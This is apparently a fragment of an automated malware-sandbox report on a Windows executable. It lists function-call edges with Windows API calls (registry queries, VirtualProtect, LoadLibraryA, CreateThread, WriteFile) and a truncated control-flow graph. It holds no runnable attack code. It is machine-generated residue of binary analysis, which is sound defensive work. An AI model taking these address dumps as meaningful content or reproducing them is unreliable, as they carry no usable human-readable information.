API calls 95094->95099 95100 496eed 48 API calls 95095->95100 95101 4963fc 48 API calls 95096->95101 95098 496384 95102 4a1b90 48 API calls 95098->95102 95099->95089 95103 496350 95100->95103 95104 501cb5 95101->95104 95108 496394 95102->95108 95105 4963fc 48 API calls 95103->95105 95104->95104 95105->95086 95106 4a1b90 48 API calls 95106->95108 95108->95106 95109 4963fc 48 API calls 95108->95109 95110 4963d6 Mailbox 95108->95110 95258 496b68 48 API calls 95108->95258 95109->95108 95110->94987 95112 4940f2 __ftell_nolock 95111->95112 95113 49410b 95112->95113 95116 50370e _memset 95112->95116 95308 49660f 95113->95308 95120 496a63 48 API calls 95116->95120 95122 50378e 95120->95122 95121 494129 95333 494139 95121->95333 95122->95122 95171->94997 95200 49d7f7 48 API calls 95199->95200 95201 4961db 95200->95201 95202 496009 95201->95202 95203 496016 __ftell_nolock 95202->95203 95204 496a63 48 API calls 95203->95204 95209 49617c Mailbox 95203->95209 95206 496048 95204->95206 95214 49607e Mailbox 95206->95214 95259 4961a6 95206->95259 95207 4961a6 48 API calls 95207->95214 95208 49614f 95208->95209 95210 49ce19 48 API calls 95208->95210 95209->95041 95212 496170 95210->95212 95211 49ce19 48 API calls 95211->95214 95213 4964cf 48 API calls 95212->95213 95213->95209 95214->95207 95214->95208 95214->95209 95214->95211 95262 4964cf 95214->95262 95217 4941a9 136 API calls 95216->95217 95218 4939fe 95217->95218 95219 493a06 95218->95219 95268 4dc396 95218->95268 95219->95047 95221 502ff0 95224 4b1c9d _free 47 API calls 95221->95224 95223 494252 84 API calls 95223->95221 95225 502ffd 95224->95225 95226 494252 84 API calls 95225->95226 95227 503006 95226->95227 95227->95227 95229 4af4ea 48 API calls 95228->95229 95230 496237 95229->95230 95230->95052 95232 49641f 95231->95232 95233 496406 95231->95233 95234 496a63 48 API calls 95232->95234 95235 496eed 48 API calls 95233->95235 95236 4962d1 95234->95236 95235->95236 95237 4b0fa7 95236->95237 95238 4b1028 95237->95238 95239 4b0fb3 95237->95239 95305 4b103a 59 API calls 3 library calls 95238->95305 95246 4b0fd8 95239->95246 95303 4b7c0e 47 API calls __getptd_noexit 95239->95303 95242 4b1035 95242->95069 95243 4b0fbf 95304 4b6e10 8 API calls _xtow_s@20 95243->95304 95245 4b0fca 95245->95069 95246->95069 95248 4ac064 95247->95248 95250 4ac069 Mailbox 95247->95250 95306 4ac1af 48 API calls 95248->95306 95256 4ac077 95250->95256 95307 4ac15c 48 API calls 95250->95307 95252 4af4ea 48 API calls 95254 4ac108 95252->95254 95253 4ac152 95253->95098 95255 4af4ea 48 API calls 95254->95255 95257 4ac113 95255->95257 95256->95252 95256->95253 95257->95098 95258->95108 95260 49bdfa 48 API calls 95259->95260 95261 4961b1 95260->95261 95261->95206 95263 49651b 95262->95263 95267 4964dd ___crtGetEnvironmentStringsW 95262->95267 95265 4af4ea 48 API calls 95263->95265 95264 4af4ea 48 API calls 95266 4964e4 95264->95266 95265->95267 95266->95214 95267->95264 95269 494517 83 API calls 95268->95269 95270 4dc405 95269->95270 95271 4dc56d 94 API calls 95270->95271 95272 4dc417 95271->95272 95273 4944ed 64 API calls 95272->95273 95274 4dc41b 95272->95274 95275 4dc432 95273->95275 95274->95221 95274->95223 95276 4944ed 64 API calls 95275->95276 95277 4dc442 95276->95277 95278 4944ed 64 API calls 95277->95278 95279 4dc45d 95278->95279 95280 4944ed 64 API calls 95279->95280 95281 4dc478 95280->95281 95282 494517 83 API calls 95281->95282 95283 4dc48f 95282->95283 95284 4b395c __crtCompareStringA_stat 47 API calls 95283->95284 95285 4dc496 95284->95285 95286 4b395c __crtCompareStringA_stat 47 API calls 95285->95286 95287 4dc4a0 95286->95287 95288 4944ed 64 API calls 95287->95288 95289 4dc4b4 95288->95289 95290 4dbf5a GetSystemTimeAsFileTime 95289->95290 95291 4dc4c7 95290->95291 95292 4dc4dc 95291->95292 95293 4dc4f1 95291->95293 95296 4b1c9d _free 47 API calls 95292->95296 95294 4dc4f7 95293->95294 95295 4dc556 95293->95295 95297 4db965 118 API calls 95294->95297 95298 4b1c9d _free 47 API calls 95295->95298 95299 4dc4e2 95296->95299 95300 4dc54e 95297->95300 95298->95274 95301 4b1c9d _free 47 API calls 95299->95301 95302 4b1c9d _free 47 API calls 95300->95302 95301->95274 95302->95274 95303->95243 95304->95245 95305->95242 95306->95250 95307->95256 95367 4bf8a0 95308->95367 95311 496a63 48 API calls 95312 496643 95311->95312 95369 496571 95312->95369 95315 4940a7 95316 4bf8a0 __ftell_nolock 95315->95316 95317 4940b4 GetLongPathNameW 95316->95317 95318 496a63 48 API calls 95317->95318 95319 4940dc 95318->95319 95320 4949a0 95319->95320 95321 49d7f7 48 API calls 95320->95321 95322 4949b2 95321->95322 95323 49660f 49 API calls 95322->95323 95324 4949bd 95323->95324 95325 4949c8 95324->95325 95328 502e35 95324->95328 95327 4964cf 48 API calls 95325->95327 95329 4949d4 95327->95329 95330 502e4f 95328->95330 95383 4ad35e 60 API calls 95328->95383 95377 4928a6 95329->95377 95332 4949e7 Mailbox 95332->95121 95334 4941a9 136 API calls 95333->95334 95335 49415e 95334->95335 95336 503489 95335->95336 95337 4941a9 136 API calls 95335->95337 95338 4dc396 122 API calls 95336->95338 95339 494172 95337->95339 95340 50349e 95338->95340 95339->95336 95341 49417a 95339->95341 95342 5034a2 95340->95342 95343 5034bf 95340->95343 95345 5034aa 95341->95345 95346 494186 95341->95346 95347 494252 84 API calls 95342->95347 95344 4af4ea 48 API calls 95343->95344 95356 503504 Mailbox 95344->95356 95472 4d6b49 87 API calls _wprintf 95345->95472 95384 49c833 95346->95384 95347->95345 95350 5034b8 95350->95343 95352 5036b4 95353 4b1c9d _free 47 API calls 95352->95353 95354 5036bc 95353->95354 95355 494252 84 API calls 95354->95355 95361 5036c5 95355->95361 95356->95352 95356->95361 95364 49ce19 48 API calls 95356->95364 95473 4d2551 48 API calls ___crtGetEnvironmentStringsW 95356->95473 95474 4d2472 60 API calls 2 library calls 95356->95474 95475 4d9c12 48 API calls 95356->95475 95476 49ba85 48 API calls ___crtGetEnvironmentStringsW 95356->95476 95477 494dd9 48 API calls 95356->95477 95360 4b1c9d _free 47 API calls 95360->95361 95361->95360 95363 494252 84 API calls 95361->95363 95478 4d25b5 86 API calls 4 library calls 95361->95478 95363->95361 95364->95356 95368 49661c GetFullPathNameW 95367->95368 95368->95311 95370 49657f 95369->95370 95373 49b18b 95370->95373 95372 494114 95372->95315 95374 49b199 95373->95374 95376 49b1a2 ___crtGetEnvironmentStringsW 95373->95376 95375 49bdfa 48 API calls 95374->95375 95374->95376 95375->95376 95376->95372 95378 4928b8 95377->95378 95382 4928d7 ___crtGetEnvironmentStringsW 95377->95382 95381 4af4ea 48 API calls 95378->95381 95379 4af4ea 48 API calls 95380 4928ee 95379->95380 95380->95332 95381->95382 95382->95379 95383->95328 95385 49c843 __ftell_nolock 95384->95385 95386 503095 95385->95386 95387 49c860 95385->95387 95500 4d25b5 86 API calls 4 library calls 95386->95500 95484 4948ba 49 API calls 95387->95484 95390 5030a8 95501 4d25b5 86 API calls 4 library calls 95390->95501 95391 49c882 95485 494550 56 API calls 95391->95485 95393 49c897 95393->95390 95395 49c89f 95393->95395 95397 49d7f7 48 API calls 95395->95397 95396 5030c4 95426 49c90c 95396->95426 95398 49c8ab 95397->95398 95486 4ae968 49 API calls __ftell_nolock 95398->95486 95400 49c8b7 95403 49d7f7 48 API calls 95400->95403 95401 49c91a 95404 4b1dfc __wsplitpath 47 API calls 95401->95404 95402 5030d7 95405 494907 CloseHandle 95402->95405 95406 49c8c3 95403->95406 95414 49c943 _wcscat _wcscpy 95404->95414 95407 5030e3 95405->95407 95409 49660f 49 API calls 95406->95409 95408 4941a9 136 API calls 95407->95408 95410 50310d 95408->95410 95411 49c8d1 95409->95411 95412 503136 95410->95412 95416 4dc396 122 API calls 95410->95416 95487 4aeb66 SetFilePointerEx ReadFile 95411->95487 95502 4d25b5 86 API calls 4 library calls 95412->95502 95415 49c96d SetCurrentDirectoryW 95414->95415 95419 4af4ea 48 API calls 95415->95419 95420 503129 95416->95420 95417 49c8fd 95488 4946ce SetFilePointerEx SetFilePointerEx 95417->95488 95423 49c988 95419->95423 95424 503131 95420->95424 95425 503152 95420->95425 95422 50314d 95456 49cad1 Mailbox 95422->95456 95427 4947b7 48 API calls 95423->95427 95428 494252 84 API calls 95424->95428 95429 494252 84 API calls 95425->95429 95426->95401 95426->95402 95459 49c993 Mailbox __wsetenvp 95427->95459 95428->95412 95430 503157 95429->95430 95431 4af4ea 48 API calls 95430->95431 95438 503194 95431->95438 95432 49ca9d 95496 494907 95432->95496 95436 49caa9 SetCurrentDirectoryW 95436->95456 95437 493d98 95437->94990 95437->94999 95503 49ba85 48 API calls ___crtGetEnvironmentStringsW 95438->95503 95442 5033ce 95509 4d9b72 48 API calls 95442->95509 95443 503467 95513 4d25b5 86 API calls 4 library calls 95443->95513 95446 503480 95446->95432 95452 50345f 95512 4d240b 48 API calls 3 library calls 95452->95512 95454 49ce19 48 API calls 95454->95459 95479 4948dd 95456->95479 95459->95432 95459->95443 95459->95452 95459->95454 95489 49b337 56 API calls _wcscpy 95459->95489 95490 4ac258 GetStringTypeW 95459->95490 95491 49cb93 59 API calls __wcsnicmp 95459->95491 95492 49cb5a GetStringTypeW __wsetenvp 95459->95492 95493 4b16d0 GetStringTypeW wcstoxq 95459->95493 95494 49cc24 162 API calls 3 library calls 95459->95494 95495 4ac682 48 API calls 95459->95495 95463 49ce19 48 API calls 95469 5031dd Mailbox 95463->95469 95466 503420 95511 4d25b5 86 API calls 4 library calls 95466->95511 95469->95442 95469->95463 95469->95466 95504 4d2551 48 API calls ___crtGetEnvironmentStringsW 95469->95504 95505 4d2472 60 API calls 2 library calls 95469->95505 95506 4d9c12 48 API calls 95469->95506 95507 49ba85 48 API calls ___crtGetEnvironmentStringsW 95469->95507 95508 4ac682 48 API calls 95469->95508 95472->95350 95473->95356 95474->95356 95475->95356 95476->95356 95477->95356 95478->95361 95480 494907 CloseHandle 95479->95480 95481 4948e5 Mailbox 95480->95481 95482 494907 CloseHandle 95481->95482 95483 4948fc 95482->95483 95483->95437 95484->95391 95485->95393 95486->95400 95487->95417 95488->95426 95489->95459 95490->95459 95491->95459 95492->95459 95493->95459 95494->95459 95495->95459 95497 494911 95496->95497 95498 494920 95496->95498 95497->95436 95498->95497 95499 494925 CloseHandle 95498->95499 95499->95497 95500->95390 95501->95396 95502->95422 95503->95469 95504->95469 95505->95469 95506->95469 95507->95469 95508->95469 95512->95443 95513->95446 95586 508eb8 95590 4da635 95586->95590 95588 508ec3 95589 4da635 84 API calls 95588->95589 95589->95588 95591 4da66f 95590->95591 95595 4da642 95590->95595 95591->95588 95592 4da671 95602 4aec4e 81 API calls 95592->95602 95593 4da676 95596 49936c 81 API calls 95593->95596 95595->95591 95595->95592 95595->95593 95599 4da669 95595->95599 95597 4da67d 95596->95597 95598 49510d 48 API calls 95597->95598 95598->95591 95601 4a4525 61 API calls ___crtGetEnvironmentStringsW 95599->95601 95601->95591 95602->95593 95603 5aff90 95604 5affa0 VirtualProtect VirtualProtect 95603->95604 95606 5b0164 95604->95606 95606->95606 95607 5019ba 95612 4ac75a 95607->95612 95611 5019c9 95613 49d7f7 48 API calls 95612->95613 95614 4ac7c8 95613->95614 95620 4ad26c 95614->95620 95617 4ac865 95618 4ac881 95617->95618 95623 4ad1fa 48 API calls ___crtGetEnvironmentStringsW 95617->95623 95619 4b0f0a 52 API calls __cinit 95618->95619 95619->95611 95624 4ad298 95620->95624 95623->95617 95625 4ad28b 95624->95625 95626 4ad2a5 95624->95626 95625->95617 95626->95625 95627 4ad2ac RegOpenKeyExW 95626->95627 95627->95625 95628 4ad2c6 RegQueryValueExW 95627->95628 95629 4ad2fc RegCloseKey 95628->95629 95630 4ad2e7 95628->95630 95629->95625 95630->95629 95631 493742 95632 49374b 95631->95632 95633 493769 95632->95633 95634 4937c8 95632->95634 95671 4937c6 95632->95671 95638 49382c PostQuitMessage 95633->95638 95639 493776 95633->95639 95636 501e00 95634->95636 95637 4937ce 95634->95637 95635 4937ab NtdllDefWindowProc_W 95673 4937b9 95635->95673 95686 492ff6 16 API calls 95636->95686 95640 4937d3 95637->95640 95641 4937f6 SetTimer RegisterClipboardFormatW 95637->95641 95638->95673 95643 501e88 95639->95643 95644 493781 95639->95644 95646 501da3 95640->95646 95647 4937da KillTimer 95640->95647 95649 49381f CreatePopupMenu 95641->95649 95641->95673 95691 4d4ddd 60 API calls _memset 95643->95691 95650 493789 95644->95650 95651 493836 95644->95651 95656 501da8 95646->95656 95657 501ddc MoveWindow 95646->95657 95683 493847 Shell_NotifyIconW _memset 95647->95683 95648 501e27 95687 4ae312 335 API calls Mailbox 95648->95687 95649->95673 95652 501e6d 95650->95652 95653 493794 95650->95653 95676 4aeb83 95651->95676 95652->95635 95690 4ca5f3 48 API calls 95652->95690 95660 501e58 95653->95660 95668 49379f 95653->95668 95654 501e9a 95654->95635 95654->95673 95661 501dcb SetFocus 95656->95661 95662 501dac 95656->95662 95657->95673 95689 4d55bd 70 API calls _memset 95660->95689 95661->95673 95664 501db5 95662->95664 95662->95668 95663 4937ed 95684 49390f DeleteObject DestroyWindow Mailbox 95663->95684 95685 492ff6 16 API calls 95664->95685 95668->95635 95688 493847 Shell_NotifyIconW _memset 95668->95688 95670 501e68 95670->95673 95671->95635 95674 501e4c 95675 494ffc 67 API calls 95674->95675 95675->95671 95677 4aeb9a _memset 95676->95677 95678 4aec1c 95676->95678 95679 4951af 50 API calls 95677->95679 95678->95673 95681 4aebc1 95679->95681 95680 4aec05 KillTimer SetTimer 95680->95678 95681->95680 95682 503c7a Shell_NotifyIconW 95681->95682 95682->95680 95683->95663 95684->95673 95685->95673 95686->95648 95687->95668 95688->95674 95689->95670 95690->95671 95691->95654 95692 50197b 95697 4add94 95692->95697 95696 50198a 95698 4af4ea 48 API calls 95697->95698 95700 4add9c 95698->95700 95699 4addb0 95704 4b0f0a 52 API calls __cinit 95699->95704 95700->95699 95705 4adf3d 95700->95705 95704->95696 95706 4adda8 95705->95706 95707 4adf46 95705->95707 95709 4addc0 95706->95709 95737 4b0f0a 52 API calls __cinit 95707->95737 95710 49d7f7 48 API calls 95709->95710 95711 4addd7 GetVersionExW 95710->95711 95712 496a63 48 API calls 95711->95712 95713 4ade1a 95712->95713 95738 4adfb4 95713->95738 95716 496571 48 API calls 95719 4ade2e 95716->95719 95718 5024c8 95719->95718 95742 4adf77 95719->95742 95721 4adebb 95723 4adee3 95721->95723 95724 4adf31 GetSystemInfo 95721->95724 95722 4adea4 GetCurrentProcess 95751 4adf5f LoadLibraryA GetProcAddress 95722->95751 95745 4ae00c 95723->95745 95726 4adf0e 95724->95726 95729 4adf1c FreeLibrary 95726->95729 95730 4adf21 95726->95730 95729->95730 95730->95699 95731 4adf29 GetSystemInfo 95733 4adf03 95731->95733 95732 4adef9 95748 4adff4 95732->95748 95733->95726 95736 4adf09 FreeLibrary 95733->95736 95736->95726 95737->95706 95739 4adfbd 95738->95739 95740 49b18b 48 API calls 95739->95740 95741 4ade22 95740->95741 95741->95716 95752 4adf89 95742->95752 95756 4ae01e 95745->95756 95749 4ae00c 2 API calls 95748->95749 95750 4adf01 GetNativeSystemInfo 95749->95750 95750->95733 95751->95721 95753 4adea0 95752->95753 95754 4adf92 LoadLibraryA 95752->95754 95753->95721 95753->95722 95754->95753 95755 4adfa3 GetProcAddress 95754->95755 95755->95753 95757 4adef1 95756->95757 95758 4ae027 LoadLibraryA 95756->95758 95757->95731 95757->95732 95758->95757 95759 4ae038 GetProcAddress 95758->95759 95759->95757 95760 5019cb 95765 492322 95760->95765 95762 5019d1 95798 4b0f0a 52 API calls __cinit 95762->95798 95764 5019db 95766 492344 95765->95766 95799 4926df 95766->95799 95771 49d7f7 48 API calls 95772 492384 95771->95772 95773 49d7f7 48 API calls 95772->95773 95774 49238e 95773->95774 95775 49d7f7 48 API calls 95774->95775 95776 492398 95775->95776 95777 49d7f7 48 API calls 95776->95777 95778 4923de 95777->95778 95779 49d7f7 48 API calls 95778->95779 95780 4924c1 95779->95780 95807 49263f 95780->95807 95784 4924f1 95785 49d7f7 48 API calls 95784->95785 95786 4924fb 95785->95786 95836 492745 95786->95836 95788 492546 95789 492556 GetStdHandle 95788->95789 95790 4925b1 95789->95790 95791 50501d 95789->95791 95792 4925b7 CoInitialize 95790->95792 95791->95790 95793 505026 95791->95793 95792->95762 95843 4d92d4 53 API calls 95793->95843 95795 50502d 95844 4d99f9 CreateThread 95795->95844 95797 505039 CloseHandle 95797->95792 95798->95764 95845 492854 95799->95845 95802 496a63 48 API calls 95803 49234a 95802->95803 95804 49272e 95803->95804 95859 4927ec 6 API calls 95804->95859 95806 49237a 95806->95771 95808 49d7f7 48 API calls 95807->95808 95809 49264f 95808->95809 95810 49d7f7 48 API calls 95809->95810 95811 492657 95810->95811 95860 4926a7 95811->95860 95814 4926a7 48 API calls 95815 492667 95814->95815 95816 49d7f7 48 API calls 95815->95816 95817 492672 95816->95817 95818 4af4ea 48 API calls 95817->95818 95819 4924cb 95818->95819 95820 4922a4 95819->95820 95821 4922b2 95820->95821 95822 49d7f7 48 API calls 95821->95822 95823 4922bd 95822->95823 95824 49d7f7 48 API calls 95823->95824 95825 4922c8 95824->95825 95826 49d7f7 48 API calls 95825->95826 95827 4922d3 95826->95827 95828 49d7f7 48 API calls 95827->95828 95829 4922de 95828->95829 95830 4926a7 48 API calls 95829->95830 95831 4922e9 95830->95831 95832 4af4ea 48 API calls 95831->95832 95833 4922f0 95832->95833 95834 4922f9 RegisterClipboardFormatW 95833->95834 95835 501fe7 95833->95835 95834->95784 95837 492755 95836->95837 95838 505f4d 95836->95838 95839 4af4ea 48 API calls 95837->95839 95865 4dc942 50 API calls 95838->95865 95841 49275d 95839->95841 95841->95788 95842 505f58 95843->95795 95844->95797 95866 4d99df 54 API calls 95844->95866 95852 492870 95845->95852 95848 492870 48 API calls 95849 492864 95848->95849 95850 49d7f7 48 API calls 95849->95850 95851 492716 95850->95851 95851->95802 95853 49d7f7 48 API calls 95852->95853 95854 49287b 95853->95854 95855 49d7f7 48 API calls 95854->95855 95856 492883 95855->95856 95857 49d7f7 48 API calls 95856->95857 95858 49285c 95857->95858 95858->95848 95859->95806 95861 49d7f7 48 API calls 95860->95861 95862 4926b0 95861->95862 95863 49d7f7 48 API calls 95862->95863 95864 49265f 95863->95864 95864->95814 95865->95842 95867 509bec 95871 4a0ae0 Mailbox ___crtGetEnvironmentStringsW 95867->95871 95868 49ffe1 Mailbox 95870 4a1526 Mailbox 95923 4dcc5c 86 API calls 4 library calls 95870->95923 95871->95868 95871->95870 95893 49ce19 48 API calls 95871->95893 95899 49fec8 95871->95899 95902 4af4ea 48 API calls 95871->95902 95903 49fe30 335 API calls 95871->95903 95904 50a706 95871->95904 95906 4c97ed InterlockedDecrement 95871->95906 95909 4f0d1d 95871->95909 95912 4f0d09 95871->95912 95917 4eef61 82 API calls 2 library calls 95871->95917 95918 4ef0ac 90 API calls Mailbox 95871->95918 95919 4da6ef 48 API calls 95871->95919 95920 4ee822 335 API calls Mailbox 95871->95920 95874 4a146e 95881 496eed 48 API calls 95874->95881 95877 4a0509 95926 4dcc5c 86 API calls 4 library calls 95877->95926 95878 4af4ea 48 API calls 95878->95899 95881->95868 95882 50a922 95883 50a246 95887 496eed 48 API calls 95883->95887 95886 496eed 48 API calls 95886->95899 95887->95868 95888 4a1473 95925 4dcc5c 86 API calls 4 library calls 95888->95925 95889 50a873 95890 49d7f7 48 API calls 95890->95899 95891 50a30e 95891->95868 95921 4c97ed InterlockedDecrement 95891->95921 95892 4c97ed InterlockedDecrement 95892->95899 95893->95871 95895 4b0f0a 52 API calls __cinit 95895->95899 95896 50a973 95927 4dcc5c 86 API calls 4 library calls 95896->95927 95898 50a982 95899->95868 95899->95874 95899->95877 95899->95878 95899->95883 95899->95886 95899->95888 95899->95890 95899->95891 95899->95892 95899->95895 95899->95896 95900 4a15b5 95899->95900 95915 4a1820 335 API calls 2 library calls 95899->95915 95916 4a1d10 59 API calls Mailbox 95899->95916 95924 4dcc5c 86 API calls 4 library calls 95900->95924 95902->95871 95903->95871 95922 4dcc5c 86 API calls 4 library calls 95904->95922 95906->95871 95928 4ef8ae 95909->95928 95911 4f0d2d 95911->95871 95913 4ef8ae 129 API calls 95912->95913 95914 4f0d19 95913->95914 95914->95871 95915->95899 95916->95899 95917->95871 95918->95871 95919->95871 95920->95871 95921->95868 95922->95870 95923->95868 95924->95868 95925->95889 95926->95882 95927->95898 95929 49936c 81 API calls 95928->95929 95930 4ef8ea 95929->95930 95935 4ef92c Mailbox 95930->95935 95964 4f0567 95930->95964 95932 4efb8b 95933 4efcfa 95932->95933 95939 4efb95 95932->95939 96000 4f0688 89 API calls Mailbox 95933->96000 95935->95911 95937 4efd07 95937->95939 95940 4efd13 95937->95940 95938 4ef984 Mailbox 95938->95932 95938->95935 95941 49936c 81 API calls 95938->95941 95995 4f29e8 48 API calls ___crtGetEnvironmentStringsW 95938->95995 95996 4efda5 60 API calls 2 library calls 95938->95996 95977 4ef70a 95939->95977 95940->95935 95941->95938 95946 4efbc9 95991 4aed18 95946->95991 95949 4efbfd 95952 4ac050 48 API calls 95949->95952 95950 4efbe3 95997 4dcc5c 86 API calls 4 library calls 95950->95997 95954 4efc14 95952->95954 95953 4efbee GetCurrentProcess TerminateProcess 95953->95949 95955 4a1b90 48 API calls 95954->95955 95963 4efc3e 95954->95963 95957 4efc2d 95955->95957 95956 4efd65 95956->95935 95960 4efd7e FreeLibrary 95956->95960 95998 4f040f 105 API calls _free 95957->95998 95958 4a1b90 48 API calls 95958->95963 95960->95935 95963->95956 95963->95958 95999 49dcae 50 API calls Mailbox 95963->95999 96001 4f040f 105 API calls _free 95963->96001 95965 49bdfa 48 API calls 95964->95965 95966 4f0582 CharLowerBuffW 95965->95966 96002 4d1f11 95966->96002 95970 49d7f7 48 API calls 95971 4f05bb 95970->95971 96009 4969e9 48 API calls ___crtGetEnvironmentStringsW 95971->96009 95973 4f05d2 95974 49b18b 48 API calls 95973->95974 95976 4f05de Mailbox 95974->95976 95975 4f061a Mailbox 95975->95938 95976->95975 96010 4efda5 60 API calls 2 library calls 95976->96010 95978 4ef725 95977->95978 95982 4ef77a 95977->95982 95979 4af4ea 48 API calls 95978->95979 95980 4ef747 95979->95980 95981 4af4ea 48 API calls 95980->95981 95980->95982 95981->95980 95983 4f0828 95982->95983 95984 4f0a53 Mailbox 95983->95984 95990 4f084b _strcat _wcscpy __wsetenvp 95983->95990 95984->95946 95985 49d286 48 API calls 95985->95990 95986 49cf93 58 API calls 95986->95990 95987 4b395c 47 API calls __crtCompareStringA_stat 95987->95990 95988 49936c 81 API calls 95988->95990 95990->95984 95990->95985 95990->95986 95990->95987 95990->95988 96013 4d8035 50 API calls __wsetenvp 95990->96013 95992 4aed2d 95991->95992 95993 4aedc5 VirtualProtect 95992->95993 95994 4aed93 95992->95994 95993->95994 95994->95949 95994->95950 95995->95938 95996->95938 95997->95953 95998->95963 95999->95963 96000->95937 96001->95963 96003 4d1f3b __wsetenvp 96002->96003 96004 4d1f79 96003->96004 96006 4d1f6f 96003->96006 96007 4d1ffa 96003->96007 96004->95970 96004->95976 96006->96004 96011 4ad37a 60 API calls 96006->96011 96007->96004 96012 4ad37a 60 API calls 96007->96012 96009->95973 96010->95975 96011->96006 96012->96007 96013->95990 96014 5019dd 96019 494a30 96014->96019 96016 5019f1 96039 4b0f0a 52 API calls __cinit 96016->96039 96018 5019fb 96020 494a40 __ftell_nolock 96019->96020 96021 49d7f7 48 API calls 96020->96021 96022 494af6 96021->96022 96023 495374 50 API calls 96022->96023 96024 494aff 96023->96024 96040 49363c 96024->96040 96027 49518c 48 API calls 96028 494b18 96027->96028 96029 4964cf 48 API calls 96028->96029 96030 494b29 96029->96030 96031 49d7f7 48 API calls 96030->96031 96032 494b32 96031->96032 96046 4949fb 96032->96046 96034 494b3d _wcscat Mailbox __wsetenvp 96035 494b43 Mailbox 96034->96035 96036 4961a6 48 API calls 96034->96036 96037 49ce19 48 API calls 96034->96037 96038 4964cf 48 API calls 96034->96038 96035->96016 96036->96034 96037->96034 96038->96034 96039->96018 96041 493649 __ftell_nolock 96040->96041 96060 49366c GetFullPathNameW 96041->96060 96043 49365a 96044 496a63 48 API calls 96043->96044 96045 493669 96044->96045 96045->96027 96062 49bcce 96046->96062 96049 494a2b 96049->96034 96050 5041cc RegQueryValueExW 96051 5041e5 96050->96051 96052 504246 RegCloseKey 96050->96052 96053 4af4ea 48 API calls 96051->96053 96054 5041fe 96053->96054 96055 4947b7 48 API calls 96054->96055 96056 504208 RegQueryValueExW 96055->96056 96057 504224 96056->96057 96058 50423b 96056->96058 96059 496a63 48 API calls 96057->96059 96058->96052 96059->96058 96061 49368a 96060->96061 96061->96043 96063 49bce8 96062->96063 96067 494a0a RegOpenKeyExW 96062->96067 96064 4af4ea 48 API calls 96063->96064 96065 49bcf2 96064->96065 96066 4aee75 48 API calls 96065->96066 96066->96067 96067->96049 96067->96050

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 856 4bb043-4bb080 call 4bf8a0 859 4bb089-4bb08b 856->859 860 4bb082-4bb084 856->860 862 4bb08d-4bb0a7 call 4b7bda call 4b7c0e call 4b6e10 859->862 863 4bb0ac-4bb0d9 859->863 861 4bb860-4bb86c call 4ba70c 860->861 862->861 866 4bb0db-4bb0de 863->866 867 4bb0e0-4bb0e7 863->867 866->867 868 4bb10b-4bb110 866->868 869 4bb0e9-4bb100 call 4b7bda call 4b7c0e call 4b6e10 867->869 870 4bb105 867->870 874 4bb11f-4bb12d call 4c3bf2 868->874 875 4bb112-4bb11c call 4bf82f 868->875 902 4bb851-4bb854 869->902 870->868 885 4bb44b-4bb45d 874->885 886 4bb133-4bb145 874->886 875->874 890 4bb7b8-4bb7d5 WriteFile 885->890 891 4bb463-4bb473 885->891 886->885 889 4bb14b-4bb183 call 4b7a0d GetConsoleMode 886->889 889->885 908 4bb189-4bb18f 889->908 897 4bb7e1-4bb7e7 GetLastError 890->897 898 4bb7d7-4bb7df 890->898 894 4bb55a-4bb55f 891->894 895 4bb479-4bb484 891->895 904 4bb663-4bb66e 894->904 905 4bb565-4bb56e 894->905 900 4bb81b-4bb833 895->900 901 4bb48a-4bb49a 895->901 903 4bb7e9 897->903 898->903 910 4bb83e-4bb84e call 4b7c0e call 4b7bda 900->910 911 4bb835-4bb838 900->911 909 4bb4a0-4bb4a3 901->909 907 4bb85e-4bb85f 902->907 913 4bb7ef-4bb7f1 903->913 904->900 912 4bb674 904->912 905->900 906 4bb574 905->906 914 4bb57e-4bb595 906->914 907->861 915 4bb199-4bb1bc GetConsoleCP 908->915 916 4bb191-4bb193 908->916 917 4bb4e9-4bb520 WriteFile 909->917 918 4bb4a5-4bb4be 909->918 910->902 911->910 919 4bb83a-4bb83c 911->919 920 4bb67e-4bb693 912->920 922 4bb7f3-4bb7f5 913->922 923 4bb856-4bb85c 913->923 925 4bb59b-4bb59e 914->925 926 4bb1c2-4bb1ca 915->926 927 4bb440-4bb446 915->927 916->885 916->915 917->897 930 4bb526-4bb538 917->930 928 4bb4cb-4bb4e7 918->928 929 4bb4c0-4bb4ca 918->929 919->907 931 4bb699-4bb69b 920->931 922->900 924 4bb7f7-4bb7fc 922->924 923->907 933 4bb7fe-4bb810 call 4b7c0e call 4b7bda 924->933 934 4bb812-4bb819 call 4b7bed 924->934 935 4bb5de-4bb627 WriteFile 925->935 936 4bb5a0-4bb5b6 925->936 937 4bb1d4-4bb1d6 926->937 927->922 928->909 928->917 929->928 930->913 938 4bb53e-4bb54f 930->938 939 4bb6d8-4bb719 WideCharToMultiByte 931->939 940 4bb69d-4bb6b3 931->940 933->902 934->902 935->897 948 4bb62d-4bb645 935->948 945 4bb5b8-4bb5ca 936->945 946 4bb5cd-4bb5dc 936->946 949 4bb36b-4bb36e 937->949 950 4bb1dc-4bb1fe 937->950 938->901 951 4bb555 938->951 939->897 944 4bb71f-4bb721 939->944 952 4bb6c7-4bb6d6 940->952 953 4bb6b5-4bb6c4 940->953 957 4bb727-4bb75a WriteFile 944->957 945->946 946->925 946->935 948->913 959 4bb64b-4bb658 948->959 954 4bb370-4bb373 949->954 955 4bb375-4bb3a2 949->955 960 4bb200-4bb215 950->960 961 4bb217-4bb223 call 4b1688 950->961 951->913 952->931 952->939 953->952 954->955 962 4bb3a8-4bb3ab 954->962 955->962 964 4bb77a-4bb78e GetLastError 957->964 965 4bb75c-4bb776 957->965 959->914 966 4bb65e 959->966 967 4bb271-4bb283 call 4c40f7 960->967 980 4bb269-4bb26b 961->980 981 4bb225-4bb239 961->981 969 4bb3ad-4bb3b0 962->969 970 4bb3b2-4bb3c5 call 4c5884 962->970 974 4bb794-4bb796 964->974 965->957 972 4bb778 965->972 966->913 983 4bb289 967->983 984 4bb435-4bb43b 967->984 969->970 976 4bb407-4bb40a 969->976 970->897 990 4bb3cb-4bb3d5 970->990 972->974 974->903 979 4bb798-4bb7b0 974->979 976->937 986 4bb410 976->986 979->920 985 4bb7b6 979->985 980->967 987 4bb23f-4bb254 call 4c40f7 981->987 988 4bb412-4bb42d 981->988 991 4bb28f-4bb2c4 WideCharToMultiByte 983->991 984->903 985->913 986->984 987->984 996 4bb25a-4bb267 987->996 988->984 993 4bb3fb-4bb401 990->993 994 4bb3d7-4bb3ee call 4c5884 990->994 991->984 995 4bb2ca-4bb2f0 WriteFile 991->995 993->976 994->897 1001 4bb3f4-4bb3f5 994->1001 995->897 998 4bb2f6-4bb30e 995->998 996->991 998->984 1000 